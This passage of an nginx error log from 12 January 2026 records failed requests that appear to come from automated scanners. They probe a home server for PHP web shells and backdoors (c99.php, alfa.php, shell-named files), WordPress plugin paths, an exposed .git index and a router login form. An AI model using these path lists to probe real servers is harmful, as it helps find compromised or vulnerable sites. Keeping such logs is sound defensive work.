/jvcpa.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:39 [error] 210#210: *1954 open() "/var/www/html/zil.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /zil.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:40 [error] 210#210: *1954 open() "/var/www/html/images/uploadform.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /images/uploadform.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:40 [error] 210#210: *1954 open() "/var/www/html/system_log.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /system_log.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:40 [error] 210#210: *1954 open() "/var/www/html/wordpress/clo.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wordpress/clo.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:41 [error] 210#210: *1954 open() "/var/www/html/.well-known/zip.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /.well-known/zip.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:41 [error] 210#210: *1954 open() "/var/www/html/ar.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /ar.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:41 [error] 210#210: *1954 open() "/var/www/html/shelp.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /shelp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:41 [error] 210#210: *1954 open() "/var/www/html/wordpress/yts.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wordpress/yts.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:42 [error] 210#210: *1954 open() "/var/www/html/file.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /file.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:42 [error] 210#210: *1954 open() "/var/www/html/wp-admin/images/Mhbgf.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/Mhbgf.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:42 [error] 210#210: *1954 "/var/www/html/wp-admin/maint/index.html" is not found (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/maint/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:42 [error] 210#210: *1954 open() "/var/www/html/first.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /first.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:43 [error] 210#210: *1954 open() "/var/www/html/admin/function.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET //admin/function.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:43 [error] 210#210: *1954 open() "/var/www/html/404.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /404.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:43 [error] 210#210: *1954 open() "/var/www/html/wp/wp-includes/index.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /wp/wp-includes//index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:21:43 [error] 210#210: *1954 open() "/var/www/html/museu/yhweq.php" failed (2: No such file or directory), client: 68.218.11.70, server: localhost-nginx-proxy-manager, request: "GET /museu/yhweq.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 05:24:04 [error] 210#210: *1956 open() "/var/www/html/.git/index" failed (2: No such file or directory), client: 77.83.39.162, server: localhost-nginx-proxy-manager, request: "GET /.git/index HTTP/1.1", host: "92.249.249.197" +2026/01/12 06:38:42 [error] 211#211: *3890 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 91.232.238.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.0", host: "92.249.249.197" +2026/01/12 06:40:06 [error] 212#212: *3894 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 167.94.138.51, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "92.249.249.197" +2026/01/12 07:05:06 [error] 212#212: *3898 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 95.214.55.41, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "92.249.249.197:80", referrer: "http://92.249.249.197:80/admin/login.asp" +2026/01/12 08:12:21 [error] 213#213: *4327 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:21 [error] 213#213: *4327 open() "/var/www/html/rymmm.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /rymmm.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:21 [error] 213#213: *4327 open() "/var/www/html/ws34.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ws34.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:21 [error] 213#213: *4327 open() "/var/www/html/ws45.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ws45.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:22 [error] 213#213: *4327 open() "/var/www/html/xxw.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /xxw.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:22 [error] 213#213: *4327 open() "/var/www/html/ws33.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ws33.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:22 [error] 213#213: *4327 open() "/var/www/html/lm13.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /lm13.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:22 [error] 213#213: *4327 open() "/var/www/html/ws38.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ws38.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:22 [error] 213#213: *4327 open() "/var/www/html/xeqdlun.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /xeqdlun.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:23 [error] 213#213: *4327 open() "/var/www/html/ws37.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ws37.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:23 [error] 213#213: *4327 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:23 [error] 213#213: *4327 open() "/var/www/html/xinder.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /xinder.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:23 [error] 213#213: *4327 open() "/var/www/html/rendi59.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /rendi59.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:23 [error] 213#213: *4327 open() "/var/www/html/test/lm.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /test/lm.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:23 [error] 213#213: *4327 open() "/var/www/html/style2.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /style2.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:24 [error] 213#213: *4327 open() "/var/www/html/alfa.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //alfa.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:24 [error] 213#213: *4327 open() "/var/www/html/wpupex.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wpupex.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:24 [error] 213#213: *4327 open() "/var/www/html/ava.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ava.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:24 [error] 213#213: *4327 open() "/var/www/html/nks.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /nks.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:24 [error] 213#213: *4327 open() "/var/www/html/wp-content/languages/index.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/languages/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:25 [error] 213#213: *4327 open() "/var/www/html/wp-content/uploads/index.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/uploads/index.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:25 [error] 213#213: *4327 open() "/var/www/html/ss.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ss.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:25 [error] 213#213: *4327 open() "/var/www/html/.well-known/content.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /.well-known/content.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:25 [error] 213#213: *4327 open() "/var/www/html/sxo.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /sxo.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:25 [error] 213#213: *4327 open() "/var/www/html/wp-content/themes/hideo/network.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/hideo/network.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:26 [error] 213#213: *4327 open() "/var/www/html/cache/wp-post-data.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /cache/wp-post-data.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:26 [error] 213#213: *4327 open() "/var/www/html/uploads/Casper.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /uploads/Casper.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:26 [error] 213#213: *4327 open() "/var/www/html/new.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /new.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:26 [error] 213#213: *4327 open() "/var/www/html/wp-admin/images/commentv.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/commentv.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:26 [error] 213#213: *4327 "/var/www/html/x/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /x/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:27 [error] 213#213: *4327 open() "/var/www/html/dom.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /dom.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:27 [error] 213#213: *4327 open() "/var/www/html/ooj.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ooj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:27 [error] 213#213: *4327 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-content/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:27 [error] 213#213: *4327 open() "/var/www/html/BGA.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /BGA.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:27 [error] 213#213: *4327 open() "/var/www/html/sad/about.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //sad/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:28 [error] 213#213: *4327 open() "/var/www/html/nas.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /nas.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:28 [error] 213#213: *4327 open() "/var/www/html/loi.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /loi.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:28 [error] 213#213: *4327 open() "/var/www/html/lov.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /lov.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:28 [error] 213#213: *4327 open() "/var/www/html/avaa.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /avaa.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:28 [error] 213#213: *4327 open() "/var/www/html/nwwha.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /nwwha.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:29 [error] 213#213: *4327 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:29 [error] 213#213: *4327 open() "/var/www/html/admin.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //admin.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:29 [error] 213#213: *4327 open() "/var/www/html/wp-includes/IXR/moon.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/IXR/moon.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:29 [error] 213#213: *4327 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //shell20211028.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:29 [error] 213#213: *4327 open() "/var/www/html/skin/install/default/security.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //skin/install/default/security.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:30 [error] 213#213: *4327 open() "/var/www/html/~norapump/hah.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /~norapump/hah.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:30 [error] 213#213: *4327 open() "/var/www/html/wp-admin/class-db.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-admin/class-db.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:30 [error] 213#213: *4327 open() "/var/www/html/buy.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //buy.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:30 [error] 213#213: *4327 open() "/var/www/html/gib.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /gib.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:30 [error] 213#213: *4327 open() "/var/www/html/des.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /des.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:31 [error] 213#213: *4327 open() "/var/www/html/wp-content/plugins/achdxhv/languages/admin.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/plugins/achdxhv/languages/admin.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:31 [error] 213#213: *4327 open() "/var/www/html/hzz.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /hzz.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:31 [error] 213#213: *4327 open() "/var/www/html/rezor.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /rezor.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:31 [error] 213#213: *4327 "/var/www/html/wp-admin/network/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/network/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:32 [error] 213#213: *4327 open() "/var/www/html/oivcl.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /oivcl.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:32 [error] 213#213: *4327 open() "/var/www/html/wp-admin/install.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/install.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:32 [error] 213#213: *4327 open() "/var/www/html/db.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /db.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:32 [error] 213#213: *4327 open() "/var/www/html/autoload_classmap.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //autoload_classmap.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:32 [error] 213#213: *4327 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:33 [error] 213#213: *4327 open() "/var/www/html/images/c99.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /images/c99.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:33 [error] 213#213: *4327 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:33 [error] 213#213: *4327 open() "/var/www/html/ps.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /ps.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:33 [error] 213#213: *4327 open() "/var/www/html/wp-content/about.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:33 [error] 213#213: *4327 open() "/var/www/html/output.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /output.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:34 [error] 213#213: *4327 open() "/var/www/html/wp-xml.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-xml.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:34 [error] 213#213: *4327 open() "/var/www/html/13.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /13.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:34 [error] 213#213: *4327 open() "/var/www/html/wp-2019.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-2019.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:34 [error] 213#213: *4327 open() "/var/www/html/classwithtostring.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /classwithtostring.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:35 [error] 213#213: *4327 "/var/www/html/.trash7309/fafa/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /.trash7309/fafa/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:35 [error] 213#213: *4327 open() "/var/www/html/wp.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:35 [error] 213#213: *4327 open() "/var/www/html/lufix.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //lufix.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:35 [error] 213#213: *4327 open() "/var/www/html/elp.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //elp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:35 [error] 213#213: *4327 open() "/var/www/html/wrt.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wrt.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:36 [error] 213#213: *4327 open() "/var/www/html/dr.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /dr.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:36 [error] 213#213: *4327 "/var/www/html/wp-includes/blocks/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/blocks/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:36 [error] 213#213: *4327 open() "/var/www/html/wtu.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /wtu.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:36 [error] 213#213: *4327 open() "/var/www/html/blog/byp.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /blog/byp.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:36 [error] 213#213: *4327 open() "/var/www/html/led.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /led.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:37 [error] 213#213: *4327 open() "/var/www/html/bhfnd.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /bhfnd.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:37 [error] 213#213: *4327 open() "/var/www/html/index/function.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //index/function.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:37 [error] 213#213: *4327 open() "/var/www/html/readme.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /readme.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:37 [error] 213#213: *4327 open() "/var/www/html/aku.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /aku.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:37 [error] 213#213: *4327 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:38 [error] 213#213: *4327 open() "/var/www/html/x.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /x.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:38 [error] 213#213: *4327 open() "/var/www/html/fox.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /fox.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:38 [error] 213#213: *4327 open() "/var/www/html/7f8c8.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /7f8c8.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:38 [error] 213#213: *4327 open() "/var/www/html/poj.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /poj.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:38 [error] 213#213: *4327 open() "/var/www/html/zze.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /zze.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:38 [error] 213#213: *4327 "/var/www/html/wp-content/index.html" is not found (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/ HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:39 [error] 213#213: *4327 open() "/var/www/html/weozh.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /weozh.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:39 [error] 213#213: *4327 open() "/var/www/html/wp-content/themes/about.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //wp-content/themes/about.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:39 [error] 213#213: *4327 open() "/var/www/html/zznmg.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /zznmg.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:39 [error] 213#213: *4327 open() "/var/www/html/help/crnpwfiu.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /help/crnpwfiu.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:39 [error] 213#213: *4327 open() "/var/www/html/eru.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /eru.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:40 [error] 213#213: *4327 open() "/var/www/html/index/zwso.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /index/zwso.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:40 [error] 213#213: *4327 open() "/var/www/html/images/2008.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET /images/2008.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:40 [error] 213#213: *4327 open() "/var/www/html/.cache/x.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET //.cache/x.php HTTP/1.1", host: "92-249-249-197.pool.digikabel.hu" +2026/01/12 08:12:40 [error] 213#213: *4327 open() "/var/www/html/pow.php" failed (2: No such file or directory), client: 20.239.71.136, server: localhost-nginx-proxy-manager, request: "GET 